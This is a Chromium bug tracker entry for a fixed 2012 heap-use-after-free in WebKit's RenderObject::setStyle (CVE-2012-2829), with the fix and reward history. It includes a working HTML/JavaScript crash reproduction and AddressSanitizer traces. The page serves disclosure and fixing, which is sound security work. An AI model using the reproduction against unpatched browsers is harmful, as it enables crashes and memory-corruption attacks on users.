Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Dec 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::RenderObject::setStyle
Reported by miau...@gmail.com, May 27 2012 Back to list

VULNERABILITY DETAILS
use-after-free in WebCore::RenderObject::setStyle

VERSION
Chrome Version: stable + dev 

Chromium	21.0.1154.0 (Developer Build 139215)
OS	Linux
WebKit	537.1 (@118560)

Operating System: 64bit preceise

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-columns: 1;
      } 
      #el2:first-of-type {
      } 
      #el2:first-letter {
        content: counter(c);
      } 
      #el3 {
        -webkit-column-span: all;
        content: counter(c) attr(A);
      } 
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('b')
        el0.appendChild(el1)
        el1.appendChild(document.createTextNode('A'))
        el2=document.createElement('div')
        el2.setAttribute('id','el2')
        el0.appendChild(el2)
        el3=document.createElement('div')
        el3.setAttribute('id','el3')
        el2.appendChild(el3)
        document.designMode='on'
        document.execCommand('selectall')
        el2.appendChild(document.createTextNode('AA'))
        document.designMode='on'
        document.execCommand('selectall')
        document.execCommand('removeFormat')
      }
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: asan + tab
Crash State: 


==9160== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffe788ed98 at pc 0x55555b09e4e6 bp 0x7fffffff5d50 sp 0x7fffffff5d48
READ of size 8 at 0x7fffe788ed98 thread T0
    #0 0x55555b09e4e6 in WebCore::RenderObject::setStyle(WTF::PassRefPtr<WebCore::RenderStyle>) ???:0
    #1 0x555559565c9d in WebCore::Text::recalcTextStyle(WebCore::Node::StyleChange) ???:0
    #2 0x5555594a0467 in WebCore::Element::recalcStyle(WebCore::Node::StyleChange) ???:0
    #3 0x5555594a042b in WebCore::Element::recalcStyle(WebCore::Node::StyleChange) ???:0


0x7fffe788ed98 is located 24 bytes inside of 120-byte region [0x7fffe788ed80,0x7fffe788edf8)
freed by thread T0 here:
    #0 0x55555e567bf2 in free ??:0
    #1 0x55555ae49b1f in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderObject*, WebCore::RenderObject*) ???:0
    #2 0x55555ae4a83e in WebCore::RenderBlock::updateFirstLetter() ???:0
    #3 0x55555b09de29 in WebCore::RenderObject::setStyle(WTF::PassRefPtr<WebCore::RenderStyle>) ???:0
    #4 0x555559565c9d in WebCore::Text::recalcTextStyle(WebCore::Node::StyleChange) ???:0



 
stable-24120.txt
12.9 KB View Download
24120.html
1.1 KB View Download
24120.txt
13.3 KB View Download
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta SecSeverity-High OS-All Mstone-19 Stability-AddressSanitizer
Status: Available
Summary: Heap-use-after-free in WebCore::RenderObject::setStyle (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=52474168

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f3e3f056998
Crash State:
  - crash stack -
  WebCore::RenderObject::setStyle
  WebCore::Text::recalcTextStyle
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  

Minimized Testcase (0.92 Kb): https://cluster-fuzz.appspot.com/download/AMIfv94TekDyHOEkzFQvHULN9xEHmgPqZOf9EuJxtjufcjiu5dPoLDpBgcuzCN9x0S1_yZ4iQWAvrvQu2LwKxTiGjTySk9vRAiLbCzjqVfANGuNgHg7RwHOPmGr2Hxa1tnCnX8YWOMAVA2oiVQQ4RIQn6q-HuSm-CA
upstreamed - https://bugs.webkit.org/show_bug.cgi?id=87751. looking.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Owner: infe...@chromium.org
Status: FixUnreleased
http://trac.webkit.org/changeset/118816
Labels: reward-topanel
Thanks miaubiz! Keep 'em coming :)
Project Member Comment 6 by clusterf...@chromium.org, May 30 2012
ClusterFuzz has detected this issue as fixed in range 139395:139500.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=52474168

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f3e3f056998
Crash State:
  - crash stack -
  WebCore::RenderObject::setStyle
  WebCore::Text::recalcTextStyle
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=139395:139500

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94TekDyHOEkzFQvHULN9xEHmgPqZOf9EuJxtjufcjiu5dPoLDpBgcuzCN9x0S1_yZ4iQWAvrvQu2LwKxTiGjTySk9vRAiLbCzjqVfANGuNgHg7RwHOPmGr2Hxa1tnCnX8YWOMAVA2oiVQQ4RIQn6q-HuSm-CA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Mstone-19 -Merge-Approved Mstone-20 Merge-Merged
M20: http://trac.webkit.org/changeset/119632
Labels: -reward-topanel reward-1000 reward-unpaid
$1000
Labels: CVE-2012-2829
Labels: -reward-unpaid
Project Member Comment 11 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Project Member Comment 13 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecImpacts-Beta -SecSeverity-High -Mstone-20 -Stability-AddressSanitizer Cr-Content M-20 Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 14 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 15 by bugdroid1@chromium.org, Mar 14 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 17 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 18 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 19 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 20 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 21 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 22 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 23 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 24 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment